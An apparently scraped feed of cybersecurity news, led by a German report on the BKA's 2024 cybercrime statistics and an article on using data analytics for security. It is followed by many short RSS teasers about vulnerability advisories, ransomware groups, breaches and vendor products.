Bundesinnenminister Alexander Dobrindt will stärker gegen Cyberkriminalität vorgehen.Max Acronym – shutterstock.com Bundesinnenminister Alexander Dobrindt (CSU) hat Maßnahmen angekündigt, um Cyberkriminalität künftig effektiver bekämpfen zu können. “Wir rüsten massiv auf: rechtlich, technisch und organisatorisch”, sagte er bei der Vorstellung des Bundeslagebilds Cybercrime 2024 des Bundeskriminalamt (BKA) . Konkret gehe es dabei um mehr Befugnisse für die Sicherheitsbehörden sowie höhere Sicherheitsstandards in Staat und Verwaltung. Bereits existierende Werkzeuge, über die das BKA schon verfüge, sollten mit Künstlicher Intelligenz (KI) weiterentwickelt werden. Auf der Seite der Angreifer werde KI unter anderem genutzt, um die Geschädigten von Phishing-Attacken leichter täuschen und damit zur Preisgabe von Zugangsdaten verleiten zu können.  Deutschland stehe stark im Fokus von Cyberkriminellen und sogenannten Hacktivisten aus dem Ausland, sagte BKA-Präsident, Holger Münch. Wie aus dem Lagebild hervorgeht, nimmt der Anteil der von Cyberkriminellen aus dem Ausland verübten bekannten Straftaten zu. Die Zahl der Fälle, bei denen die mutmaßlichen Täter im Inland verortet werden, sank leicht im Vergleich zum Vorjahr – von rund 134.000 Fällen auf rund 131.000 Fälle. Bei den aus dem Ausland heraus verübten Taten war dagegen laut BKA-Präsident Holger Münch ein Zuwachs von rund 190.000 auf knapp 202.000 Fälle zu verzeichnen.  Hohes Dunkelfeld Münch sagte, das Dunkelfeld sei in diesem Bereich sehr hoch. Er rief Geschädigte dazu auf, Cyberstraftaten anzuzeigen. Dem Lagebild zufolge etablieren sich Messenger-Dienste zunehmend als Vertriebskanal für sogenannte Cybercrime-as-a-Service-Angebote. Darunter versteht man ein Geschäftsmodell, bei dem kriminelle Dienstleistungen oder Tools über das Internet angeboten werden. Bislang wurden diese kriminellen Service-Pakete vor allem im Darknet oder in einschlägigen Foren angeboten. Ransomware bleibt die größte Bedrohung Darüber hinaus zeigt der BKA-Bericht, dass Ransomware die prägende Bedrohung im Cyberraum bleibt und weiterhin erhebliche Schäden bei Unternehmen und Privatpersonen verursacht. Deutschlandweit wurden 950 Ransomware-Angriffe angezeigt und im internationalen Vergleich ist Deutschland weiterhin das am vierthäufigsten betroffene Land. Jeden Tag werden der Polizei in Deutschland zwei bis drei schwere Ransomware-Angriffe angezeigt. Bei 72 Prozent der Ransomware-Vorfälle handelte es sich um Double-Extortion. Hierbei fordern Angreifer nicht nur eine Zahlung für die Entschlüsselung, sondern auch dafür, dass sie die zuvor gestohlenen Daten nicht veröffentlichen. Wenn Lösegeld floss, dann wurden im Mittel knapp 280.000 Dollar bezahlt. Die Hälfte der Angriffe betrafen Organisationen aus dem Handel, dem Gesundheitswesen und dem verarbeitenden Gewerbe. Insbesondere kleine und mittelständische Unternehmen sind betroffen: 80 Prozent der Attacken betrafen KMUs. Einrichtungen des Gesundheitswesens wurden ebenfalls häufig angegriffen. Neben der Gefahr für Leib und Leben sind hierbei oftmals besonders sensible Daten betroffen, berichtet das BKA. Gewerkschaft sieht Polizei nicht gut aufgestellt “Der digitale Raum wird zunehmend zum Handlungsmittelpunkt organisierter Kriminalität mit einem nicht einzuschätzenden Dunkelfeld”, sagt der stellvertretende Bundesvorsitzende der Gewerkschaft der Polizei (GdP), Alexander Poitz. Aktuell seien die Sicherheitsbehörden dieser Entwicklung nicht gewachsen. Strukturelle, personelle und technische Defizite verhinderten hier eine wirksame Kriminalitätsbekämpfung. Wenn Politik, Justiz und Polizei nicht rasch und entschlossen handelten, bestehe die Gefahr, dass man den Anschluss verliere – und dann auch die Kontrolle.  Eine positivere Bilanz zog BKA-Präsident Münch. Er erklärte: “Mit unseren international koordinierten Maßnahmen haben wir auch im vergangenen Jahr wieder gezeigt, dass wir nicht nachlassen und der gesteigerten Bedrohungslage effektive polizeiliche Maßnahmen entgegensetzen.” (dpa/jm)

A Network Source of Truth (NSoT) is critical to sustainable network automation, especially in the context of hybrid multicloud. As DDI (DNS-DHCP-IPAM) platforms contain rich, authoritative network data, they form the ideal foundation for building a trusted NSoT. This blog explores what an NSoT is, why it matters for network automation, how to build one… The post Scaling Automation with a DDI-Enabled Network Source of Truth  appeared first on EfficientIP.

Data analytics platforms and the information they contain are among the most important corporate resources CISOs are charged with protecting, but data analytics can also be an effective tool for helping security teams identify and mitigate risks. With artificial intelligence (AI), machine learning (ML), and data science constantly advancing in their capabilities, cybersecurity chiefs can pinpoint the signs of attacks like never before. And that can help their teams initiate mitigation more quickly. “Security today is as much about smart data use as it is about traditional defenses,” says Timothy Bates, a professor of AI, cybersecurity, and other technologies at the University of Michigan College of Innovation and Technology, and former CISO at General Motors. “Data science and machine learning gave us the context and timing to act before incidents escalated.” When Bates worked for General Motors, one of the auto manufacturer’s most impactful initiatives was architecting a global security operations center (SOC) to shift from a reactive to a proactive cybersecurity posture. The company used intrusion detection tools and a security information and event management (SIEM) platform to aggregate and analyze logs across a complex, distributed infrastructure. “Through data analytics, we processed billions of log events daily, creating behavioral baselines that allowed us to detect anomalies in real-time,” Bates says. “One notable case involved identifying unusual login and command-line activity patterns within our manufacturing networks. That insight allowed us to stop a credential-stuffing attack before it reached critical systems, preventing what could have been a multimillion-dollar incident.” AI, ML, data science “are an enormous help with large data sets, which cybersecurity is packed full of,” says Nick Kathmann, CISO and CIO at governance, risk, and compliance provider LogicGate. “While core benefits are still under development, the immediate uses are already bearing fruit when combining those huge security datasets [with] risk management.” Just having security data pouring in and deploying AI and analytical tools doesn’t guarantee success, however. Enterprises and their security teams need to adhere to best practices. Here are some tips for getting the best results from leveraging data for cybersecurity. Deploy machine learning for deep pattern recognition analysis One good practice is to pair a SIEM platform with ML models to analyze patterns across billions of daily log entries, Bates says. “Build behavioral baselines across business units, then flag deviations in real-time,” he says. “Logs alone don’t tell you what’s wrong. Patterns do. Machine learning gave our SOC superpowers — turning noisy data into action-ready insight.” That deeper analysis proved vital to thwarting the credential-stuffing attack at GM, Bates notes. “The activity mimicked internal [administration] behavior — but just off enough for our system to flag it,” he says. At BairesDev, ML data analysis offers the opportunity to spot threats and unusual activity more quickly. “It uses your network traffic, user behavior, and device activity to learn about you and define what’s normal,” says Pablo Riboldi, CISO at the nearshore software development company. “Then, it flags any suspicious activity in real-time. This early detection helps security teams get ahead of insider threats, compromised accounts, or attackers moving within the network before they can do real harm.” ML tools can help identify phishing attempts, even sophisticated ones that might slip past regular filters, Riboldi says. “Over time, these systems get better,” he says. “This leads to fewer false alarms and more focus on actual threats. As not all security weaknesses are the same, machine learning can help prioritize those vulnerabilities that are a threat for the business.” Emphasize the ‘learning’ part of ML To be truly effective, models need to be retrained with new data to keep up with changing threat vectors and shifting cyber criminal behavior. “Machine learning models get smarter with your help,” Riboldi says. “Make sure to have feedback loops. Letting analysts label events and adjust settings constantly improves their accuracy. Also, the data you give them is key. It needs to be good, secure, and come from different sources, like your computers, the cloud, login systems, etc.” Building a well-integrated data lake or SIEM platform ensures that the ML models have context-rich data to work with, Riboldi says. “Don’t just monitor known bads — train your models to recognize when something’s ‘not quite right,’ even if it’s never been flagged before,” Bates says. “The most dangerous attacks don’t trip the typical wires. It’s the subtle shifts — logins at odd hours, a dev script being run from an unexpected host — that often point to breach activity.” Fuse data science into your security team At many enterprises, data science/analytics and cybersecurity teams are separate entities. But it’s a good idea to blend the SOC team with data scientists who understand the corporate infrastructure and can tune models based on overall context rather than just generic patterns, Bates says. “Cybersecurity is no longer just about firewalls and antivirus,” Bates says. “It’s a data game now. Marrying cyber expertise with data modeling gave us the precision we needed at GM to act in real-time — not post-mortem.” Organizations with data science teams that work alongside security teams “will be leaps and bounds ahead of organizations dependent on vendors to incorporate the tooling,” LogicGate’s Kathmann says. “Especially in the interconnected and vendor-agnostic world we live in now, collaboration between accountable teams is key,” Kathmann says. Having a data science team understand the end goals of the organization, and then collaborate with a security team to facilitate the collection and storage of data in a data warehouse or data lake, is the best approach, he says. Ensure top-quality data governance and integration “To get the most cybersecurity value out of data and AI capabilities, organizations should focus on ensuring data quality and integrating across data sources,” says Anay Nawathe, director at global technology research and advisory firm ISG. “Organizations should consistently cleanse, normalize, and validate data as appropriate, to increase accuracy of the findings and minimize model drift,” Nawathe says. Data integration across diverse data sources enables cybersecurity teams to receive more context around any given trend or anomaly, which leads to richer insights into complex threats, Nawathe says. Along the same lines, organizations need to integrate threat detection across the business — not just the perimeter. “Ensure your SOC integrates deeply into operational environments like operational technology networks and cloud systems,” Bates says. “Threat actors know the gaps; don’t let your factory floor or [development] pipeline be one of them. This is important because cyberattacks often hide in overlooked places, such as legacy systems, remote plants, or software development operations, Bates says. “Real-time visibility across these zones helped us shut down threats before they became disasters,” he says. Supplement security with custom-trained LLMs A large language model (LLM) that has been customized to meet the specific needs of an organization can help enhance cybersecurity. “Some organizations with sophisticated cyber teams, unique security requirements, or complex environments are increasingly using customized solutions for their security analytics, though they will likely remain in a hybrid custom vs. commercial-off-the-shelf model,” Nawathe says. Some of these custom use cases are “data/risk visualization” or risk quantification initiatives that are highly specific to the organization, Nawathe says. By custom-training an LLM and using it to process and correlate raw sensor and log data, a much cleaner and more concise data feed can be sent to mainstream security tools, says Christopher Walcutt, CSO at security services provider DirectDefense. “In addition, SOC staff can experiment in real-time, using the AI to teach them how to write better queries while providing the AI additional contextual learning,” Walcutt says. “The resulting metadata can be transformational [and] allow for more advanced automation of defensive actions. Custom-trained LLMs can power AI for a number of discrete functions, one of the best being the preprocessing of event and log data, Walcutt says. AI will be able to identify groupings of behaviors that a heuristic or rules-based machine learning or other solution will be unable to detect, he says, “and in doing so, make the fidelity of data feeding the other tools much higher.” Make full use of documentation by mining it with AI Analysis of unstructured data can also reap significant rewards for cybersecurity teams. For example, AI can have a big impact on mining company documentation, including the records used to manage and secure the organization’s systems. This includes policies, procedures, and other documents that guide the organization’s cybersecurity practices. Documentation is also a vital component of the regulatory compliance function at enterprises, providing a framework for security controls.  “Reading, summarizing, and creating documentations [has] never been easier,” LogicGate’s Kathmann says. For example, security professionals can leverage AI models to read and summarize the key differences in risk frameworks and risk analysis reports, she says. “Leaders can also create a model to search through all of an organization’s SOPs [standard operating procedures] and look for specific known or suspected bad practices, identify processes that do not follow standards, or read through vendor security documents and reports,” Kathmann says.

Why? There's a war in Europe, Finland has a belligerent neighbor, and cyber is a settled field Interview  Mikko Hyppönen has spent the last 34 years creating security software that defends against criminals and state-backed actors, but now he's moving onto drone warfare.

BGD e-GOV CIRT, BCC remains committed to proactively securing the nation’s cyberspace. As the extended Eid holidays approach, we anticipate an increased risk of cyberattacks, as malicious actors often exploit periods of reduced monitoring and operational oversight. Our Cyber Threat Intelligence Unit has already identified widespread malware activity, including strains such as Android.vo1d and Avalanche-Andromeda, which have compromised thousands of IP addresses nationwide. In addition... Read More

Luxury-goods conglomerate Cartier disclosed a data breach that exposed customer information after a cyberattack. Cartier has disclosed a data breach following a cyberattack that compromised its systems, exposing customers’ personal information. The incident comes amid a wave of cyberattacks targeting luxury fashion brands. The luxury firm states that the threat actors gained access to “limited […]

A new version of the Android malware Crocodilus has introduced a deceptive feature that adds fake contacts to victims’ devices, allowing attackers to spoof calls from trusted sources. Originally detected in March 2025 by Threat Fabric researchers, Crocodilus was first seen in limited campaigns in Turkey. It initially relied on basic social engineering tactics, such as fake error messages urging users to back up their cryptocurrency wallet keys. Now, the malware has gone global. Ongoing monitoring by Threat Fabric reveals that Crocodilus is actively targeting users across all continents. Its latest versions come with significant upgrades, particularly focused on evasion […] The post New Android Malware tricks users by faking Caller Identities first appeared on Cybersafe News.

New Cisco networking research More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

New Cisco networking research More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

New Cisco networking research More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Cisco’s global study reveals a major architectural shift underway across enterprise networks.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Cisco’s global study reveals a major architectural shift underway across enterprise networks.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Cisco’s global study reveals a major architectural shift underway across enterprise networks.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Go to Device Platform Intelligence Added Platforms 25 Platforms are added Platform Name Node Type2 Node Type AB Regin HCA282DW-4 HVAC Controller HVAC IoT/OT AB Regin XCA283DW-4 Controller ICS/OT IoT/OT Automated Logic OPTIFLEX OF683-E2 BACnet Controller Building Automation System IoT/OT Carel PCO1NN0WD0 Pco Web Card ICS/OT IoT/OT Carel PCOD000WE0 Pco Web Card ICS/OT IoT/OT DENT […]

Security Advisory Description An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url ...

Hewlett Packard Enterprise (HPE) has released security updates to address as many as eight vulnerabilities in its StoreOnce data backup and deduplication solution that could result in an authentication bypass and remote code execution. "These vulnerabilities could be remotely exploited to allow remote code execution, disclosure of information, server-side request forgery, authentication bypass,...

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Fady Osman' was reported to the affected vendor on: 2025-06-04, 2 days ago. The vendor is given until 2025-10-02 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2025-06-04, 2 days ago. The vendor is given until 2025-10-02 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

In the digital collaboration rush, organizations are managing an ever-growing volume of data across multiple cloud environments, often reaching petabytes in size.

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

Though essential to daily operations, temporary populations can become a security blind spot.

CEO of India's KiranaPro, which brings convenience stores online, vows to name the perp The CEO of Indian grocery ordering app KiranaPro has claimed an attacker deleted its GitHub and AWS resources in a targeted and deliberate attack and vowed to name the perpetrator.

In the wake of high-profile attacks on UK retailers Marks & Spencer and Co-op, Scattered Spider has been all over the media, with coverage spilling over into the mainstream news due to the severity of the disruption caused — currently looking like hundreds of millions in lost profits for M&S alone. This coverage is extremely […]

Full Transcript Joe Tidy investigates what may be the cruelest and most disturbing cyber attack in history. A breach so invasive it blurred the line between digital crime and psychological torture. This story might make your skin crawl. Get more from Joe linktr.ee/joetidy. Get the book Ctrl + Alt + Chaos: How Teenage Hackers Hijack […]

Multiple vulnerabilities were identified in Google Chrome. A remote attacker could exploit some of these vulnerabilities to trigger remote code execution, sensitive information disclosure and data manipulation on the targeted system.   Note: CVE-2025-5419 is being exploited in the wild. A remote... Impact Remote Code Execution Information Disclosure Data Manipulation System / Technologies affected Google Chrome prior to 137.0.7151.68 (Linux) Google Chrome prior to 137.0.7151.68/.69 (Mac) Google Chrome prior to 137.0.7151.68/.69 (Windows) Solutions Before installation of the software, please visit the software vendor web-site for more details. Apply fixes issued by the vendor:   Update to version 137.0.7151.68 (Linux) or later Update to version 137.0.7151.68/.69 (Mac) or later Update to version 137.0.7151.68/.69 (Windows) or later

De multiples vulnérabilités ont été découvertes dans Microsoft Edge. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur. Microsoft rappelle que la vulnérabilité CVE-2025-5419 est activement exploitée.

Une vulnérabilité a été découverte dans cURL. Elle permet à un attaquant de provoquer un déni de service à distance.

De multiples vulnérabilités ont été découvertes dans Python. Elles permettent à un attaquant de provoquer une atteinte à l'intégrité des données et un contournement de la politique de sécurité.

This daily article is intended to make it easier for those who want to stay updated with my regular Dark Web Informer and X/Twitter posts.

Elevating Device Control, 300% Faster Scans, and Real-Time Results

Zuckercorp and Yandex used localhost loophole to tie browser data to app users, say boffins Security researchers say Meta and Yandex used native Android apps to listen on localhost ports, allowing them to link web browsing data to user identities and bypass typical privacy protections.

Threat Attack Daily - 3rd of June 2025

An anonymous whistleblower has released large amounts of data allegedly linked to the ransomware gangs

Ransomware Attack Update for the 3rd of June 2025

Organizations need to implement these five essential security controls to safely harness the power of autonomous AI agents while still protecting enterprise assets.

Microsoft, CrowdStrike, and pals promise clarity on cybercrew naming, deliver alias salad instead Opinion  Microsoft and CrowdStrike made a lot of noise on Monday about teaming up with other threat-intel outfits to "bring clarity to threat-actor naming."

LayerX Launches ExtensionPedia

TXOne Networks Introduces Capability for Intelligent Vulnerability Mitigation

The data-stealing malware initially targeted users in Turkey but has since evolved into a global threat.

A new study by NordPass and NordStellar reveals the automotive industry is plagued by weak, reused, and common…

Why Security Fundamentals Matter More Than Ever   Victoria’s Secret became the latest high-profile retailer to fall victim to a cyberattack, joining a growing list of brands reeling from data breaches....

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information. Google is aware that an exploit for CVE-2025-5419 exists in the wild.

Introduction to AI-Driven Zero Trust The current cybersecurity landscape demands a shift from traditional static access controls to dynamic, context-aware security models. AI-driven Zero Trust frameworks harness the power of artificial intelligence to revolutionize network access management. By continuously analyzing user behavior, device posture, and contextual factors, these systems provide real-time, adaptive security. This approach… The post Dynamic, Context-Aware Security with AI-Driven Zero Trust appeared first on Portnox.

This blog is part of a blog series detailing best practices for operational technology (OT) cybersecurity for under-resourced organizations by... The post OT Cybersecurity Best Practices for SMBs: How to Disconnect Your IT, DMZ, and OT from Each Other & What to Consider first appeared on Dragos.

But that didn't stop the clothing retailer from issuing preliminary results for the first quarter of 2025.

The most serious flaw in the monthly security update affects the Android system and could be exploited to achieve local escalation of privilege, the company said. The post Google addresses 34 high-severity vulnerabilities in June’s Android security update appeared first on CyberScoop.

The most serious flaw in the monthly security update affects the Android system and could be exploited to achieve local escalation of privilege, the company said. The post Google addresses 34 high-severity vulnerabilities in June’s Android security update appeared first on CyberScoop.

TAG team spotted the V8 bug first, so you can bet nation-states weren’t far behind Google revealed Monday that it had quietly deployed a configuration change last week to block active exploitation of a Chrome zero-day.

Digital certificates authorized by the authorities will no longer have trust by default in the browser starting in August, over what Google said is a loss of integrity in actions by the respective companies.

Google's Threat Analysis Group, which investigates government-backed hacks, was credited with the discovery of the zero-days.

LummaC2 formerly accounted for almost 92% of Russian Market's credential theft log alerts. Now, the Acreed infostealer has replaced its market share.

The company’s cloud offering for government customers achieved more important security milestones last week, allowing it’s tech tools to be used in the most sensitive, classified environments.

Musk's 'Bitcoin-style encryption' claim has experts scratching their heads Elon Musk's X social media platform is rolling out a new version of its direct messaging feature that the platform owner said had a "whole new architecture," but as with many a Muskian proclamation, there's reason to doubt what's been said. 

Network infrastructure generates a constant stream of IP traffic, and understanding how that traffic moves is essential for maintaining performance, availability, and security. NetFlow is a protocol designed to capture metadata about these traffic flows, offering a structured way to monitor activity across routers, switches, and other Layer 3 devices.  This blog explores how NetFlow works, the components involved in its deployment, and the types of... Read more » The post What is NetFlow? A 2025 Overview appeared first on Plixer.

Here is what the budget request includes for the Technology Modernization Fund, Federal Citizen Services Fund and more.

Outdoorsy brand blames credential stuffing Joining the long queue of retailers dealing with cyber mishaps is outdoorsy fashion brand The North Face, which says crooks broke into some customer accounts using login creds pinched from breaches elsewhere.

Compliance automation provider Vanta confirms a software bug exposed private customer data to other users, impacting hundreds of…

UpSkill America’s new Upskilling Playbook is a strategic guide for organizations to build, scale, and integrate skills-based workforce development initiatives that drive business performance and career growth. The post Announcing Our New Upskilling Playbook appeared first on The Aspen Institute.

Cyber Criminals Defraud Hedera Hashgraph Network Non-Custodial Wallet Users Through Nonfungible Token Airdrops Disguised as Free Rewards

Last year, KnowBe4's report "Exponential Growth in Cyber Attacks Against Higher Education Institutions" illustrated the growing cyber threats facing universities and colleges.

Researchers at Certo warn that a new AI chatbot called “Venice[.]ai” can allow cybercriminals to easily generate phishing messages or malware code.

SafePay’s journey to the top of the ransomware leaderboard was a quick one. The SafePay ransomware group first emerged in the fall of 2024, and last month took the top spot among ransomware groups in the number of victims claimed on their data leak site, according to a Cyble blog post published today. Cyble reported that ransomware groups claimed 384 victims in May, a number that may rise somewhat as all data is processed. That’s the third straight monthly decline for claimed victims, as new leaders continue to emerge after RansomHub – the top ransomware group for more than a year – went offline in late March in a possible attack by rival DragonForce. Cyble also looked at DevMan, another emerging ransomware threat, and other ransomware developments that occurred in May. Top Ransomware Groups and Threats SafePay claimed 58 victims in May to take over the top spot from April leader Qilin, which came in second with 54 victims. Play, Akira and NightSpire rounded out the top five ransomware groups. The U.S. was once again the most targeted country, with 181 victims (charts below from Cyble). [caption id="attachment_103123" align="aligncenter" width="936"] Top ransomware groups May 2025[/caption] [caption id="attachment_103124" align="aligncenter" width="936"] Ransomware attacks by country May 2025[/caption] Professional Services and Construction were the most attacked sectors by all ransomware groups, totaling 101 attacks, followed by Manufacturing, Government, Healthcare, Finance, IT, Transportation, Consumer Goods and Education, Cyble said. SafePay has claimed 198 victims to date. The group’s previous monthly high was 43 victims in March, but May was the first month that SafePay led all ransomware groups. Cyble said SafePay typically obtains initial access to victim environments through VPN and RDP connections, often using stolen credentials or password spraying attacks. The group uses double-extortion techniques – encrypting and threatening to publicly release data – and claims not to offer Ransomware-as-a-Service (RaaS), unlike other ransomware groups that rely on affiliates to spread their malware. Major targets for SafePay include the U.S. and Germany, as well as the Professional Services, Construction, Healthcare, Education and Manufacturing sectors. DevMan, meanwhile, mainly operates as an affiliate of several RaaS groups, but was recently observed deploying its own ransomware that the group claims is capable of faster lateral movement and is implemented via Group Policy Object (GPO). DevMan claimed 13 victims in May, placing it just outside the top five ransomware groups, “and making it one to watch,” Cyble said. As an affiliate, DevMan has worked with Qilin, Apos, DragonForce RaaS and RansomHub. In another significant ransomware development in May, the leak of the VanHelsing Ransomware-as-a-Service (RaaS) source code raises “concerns of potential copycat operations, as observed following the leaks of LockBit and Babuk,” Cyble said. “The widespread availability of VanHelsing’s source code may accelerate the emergence of new ransomware variants in the coming weeks." Cyble also detailed three new ransomware groups, as well as 17 ransomware attacks claimed by ransomware groups, many of which could have significant impact on the software supply chain, critical infrastructure and even military targets. Protecting Against Ransomware Cyble said the rise of new ransomware groups to take the place of former leaders “underscores the ever-present threat of ransomware and highlights the enduring importance of cybersecurity best practices for protecting against a wide range of cyber threats.” Those cybersecurity best practices include a risk-based vulnerability management program; protecting exposed assets; segmenting networks and critical assets; creating ransomware-resistant backups; applying Zero Trust principles; practicing proper configuration and secrets protection; hardening endpoints and infrastructure; and monitoring networks, endpoints and cloud environments.

In this post, we delve into the emergence of The CEO Database, analyzing the escalated threat it poses to executive protection—from doxxing to sophisticated AI-powered phishing and deepfake campaigns. The post The CEO Database Exposes Information on Over 1,000 Executives appeared first on Flashpoint.

Alleged sale of WoW Health database – 423,650 Customer Records Exposed

Dive into the novel security challenges AI introduces with the open source game that over 10,000 developers have used to sharpen their skills. The post Hack the model: Build AI security skills with the GitHub Secure Code Game appeared first on The GitHub Blog.

Dive into the novel security challenges AI introduces with the open source game that over 10,000 developers have used to sharpen their skills. The post Hack the model: Build AI security skills with the GitHub Secure Code Game appeared first on The GitHub Blog.

Security Advisory Description The BIG-IP system uses Secure Vault, a secure SSL-encrypted storage system, to securely store sensitive data such as SSL key passphrases, users, and administrator and ...

Wild variances in naming taxonomies aren’t going away, but a new initiative from the security vendors aims to more publicly address obvious overlap in threat group attribution. The post CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution appeared first on CyberScoop.

Wild variances in naming taxonomies aren’t going away, but a new initiative from the security vendors aims to more publicly address obvious overlap in threat group attribution. The post CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution appeared first on CyberScoop.

Pennsylvania’s South Williamsport Area School District (SWASD) has announced it is deploying an AI-based gun detection technology.

An internal data breach is the exposure of confidential information to an unauthorized user in an organization. We tend to think of confidential information as private information about a patient, customer, employee, etc. After all, nearly every country in the world has regulations specifying how private data can be stored, accessed, and managed. And, they can assess sizeable fines for noncompliance.  Organizations typically store personal identifiable information (PII) as records in an application database. A patient’s medical information, for example, is structured across cells in a medical application’s database table. This is why it known as “structured data.”   Protect your unstructured data But sensitive information is not just PII; it also includes an organization’s confidential or competitive proprietary data. For example, not-yet-released quarterly sales results, future marketing plans, legal documents, and more. These word processing files, spreadsheets, presentations, media files, etc., cannot be structured in a database. They are stored in folders in a network file system or in the cloud. This type of data is known as “unstructured data.” It comprises about 80 percent of an organization’s total stored data.  Organizations largely protect and manage structured data from unauthorized access through an automated process. An example is an identity and access management system (IAM) that provisions and restricts access based on user identity and role. Conversely, they will secure unstructured data through NTFS permissions assignments in Microsoft Active Directory and Microsoft Entra ID for network folders, shares, and document libraries. NTFS permissions increase the complexity of protecting unstructured data It’s these extensive and complex individual NTFS permissions assignments that can be so challenging to manage. Sure, a network administrator can check which groups, and associated members can access a specific folder by viewing the folder properties. But with potentially thousands of folders, subfolders, and document libraries storing files with confidential, sensitive, and high-value data, reviewing these permissions individually is impractical.  How OpenText can help That’s where OpenText File Reporter, a component of OpenText Data Access Governance, comes in. It has extensive reporting and analytics capabilities. File Reporter can identify all users who can access individual folders, subfolders, Microsoft 365 document libraries, their NTFS permissions. It can also identify how that access is derived. With these findings, information and security officers, network administrators, and department data owners can determine potential risks for internal data breaches.    OpenText File Reporter can present these findings in a variety of permissions report types. That way you can have the information you need to make the necessary changes to access permissions.  This capability has been incredibly useful to customers needing to perform regular vulnerability assessments on all of their confidential, sensitive, and high-value unstructured data and protect themselves from everything from inappropriate insider knowledge to insider misconduct.  With so much to lose – data security, competitive advantages, customers, employees, and reputation, as well as the potential for fines and lawsuits, organizations cannot risk the possibility of an internal data breach, especially when those risks are so easy to identify with OpenText File Reporter.  The post Identifying risks for an internal data breach within unstructured data appeared first on OpenText Blogs.

For years, a powerful farm industry group served up information on activists to the FBI. Records reveal a decade-long effort to see the animal rights movement labeled a “bioterrorism” threat.

New details in the president's budget detail some of the proposed workforce reductions, though the final cuts will likely be steeper.

DNS rebinding attack without CORS against local network web applications. Explore the topic further and see how it can be used to exploit vulnerabilities in the real-world. The post DNS rebinding attacks explained: The lookup is coming from inside the house! appeared first on The GitHub Blog.

DNS rebinding attack without CORS against local network web applications. Explore the topic further and see how it can be used to exploit vulnerabilities in the real-world. The post DNS rebinding attacks explained: The lookup is coming from inside the house! appeared first on The GitHub Blog.

Learn why many CISOs prefer Microsoft Defender for Endpoint for comprehensive cyberthreat protection across devices and platforms. The post How Microsoft Defender for Endpoint is redefining endpoint security appeared first on Microsoft Security Blog.

Security Advisory Description F5 discloses security vulnerabilities and security exposures for F5 products in Quarterly Security Notifications (QSNs). The dates of future QSNs are published in ...

The letter to Senate Homeland Security and Governmental Affairs Committee leaders comes shortly before they consider his nomination. The post Experts endorse Sean Cairncross for national cyber director ahead of Senate hearing appeared first on CyberScoop.

The letter to Senate Homeland Security and Governmental Affairs Committee leaders comes shortly before they consider his nomination. The post Experts endorse Sean Cairncross for national cyber director ahead of Senate hearing appeared first on CyberScoop.

Official Juniper Networks Blogs 转向瞻博网络数据中心网络的八大理由  如今的数据中心网络炙手可热，无论从哪个方面来看，瞻博网络都是这一领域最热门的供应商。但为什么是现在呢？又为什么是瞻博网络呢？   首先，是什么原因使得这个领域如此受青睐？最主要的原因当然是 AI。AI 正推动组织在 AI 数据中心进行大量新的投资，以应对 AI 工作负载模型训练和推理所需的高容量和严苛性能要求。    近年来，传统数据中心的火热程度也更胜以往，导致这种情况的原因至少有两个。第一个原因是 AI 的溢出效应：AI 不仅推动各组织扩建特殊用途的 AI 数据中心，而且带动了托管所有传统应用的“前端”数据中心流量的增加。    第二个原因是对公共云的抵制：面对高昂的云成本和供应商锁定问题，那些曾经认为可以将几乎所有东西都迁移到公共云的组织已经改变了方向。现在的形势非常明朗，即在可预见的未来，混合模式将成为主流趋势，相当一部分的企业工作负载将会留在私有云中。这意味着企业必须继续加大对私有数据中心的投资，并进行现代化改造，打造既能满足业务需求又兼具自动化能力的敏捷私有云基础架构。   这也解释了数据中心网络市场为什么如此受青睐。     但为什么说瞻博网络是最热门的供应商呢？   我们给出了 8 个理由：       1. 瞻博网络获评为2025 年 Gartner® 数据中心交换Magic Quadrant™领导者。这是一条最新的消息，但对我们来说，却是历经了时间的验证。我们认为，火热的市场对独立分析数据中心网络解决方案提出了更高的要求，因此 Gartner The post 转向瞻博网络数据中心网络的八大理由  appeared first on Official Juniper Networks Blogs.

The company said the cyberattack destroyed its servers and customer data.

IBM and Palo Alto Networks are collaborating to address five key security challenges and their solutions. The post Cybersecurity Challenges in the Energy and Utilities Sector appeared first on Palo Alto Networks Blog.

Official Juniper Networks Blogs 주니퍼 데이터센터 네트워킹으로 전환해야 하는 8가지 이유  데이터센터 네트워킹은 뜨거운 분야이며, 주니퍼는 여러 측면에서 이 분야에서 가장 인기 있는 벤더입니다. 그렇다면 지금 데이터센터 네트워킹이 화제인 이유는 무엇일까요? 그리고 왜 주니퍼가 주목받고 있을까요?   일단 이 분야가 이렇게 화제가 The post 주니퍼 데이터센터 네트워킹으로 전환해야 하는 8가지 이유  appeared first on Official Juniper Networks Blogs.

Following a successful pilot, the Food and Drug Administration unveiled its in-house large language model designed to help agency staff in drug clinical evaluations and reviews.

CISA director and national cyber director nominees could transform how the federal government engages with the private sector on cybersecurity issues.

CISA director and national cyber director nominees could transform how the federal government engages with the private sector on cybersecurity issues.

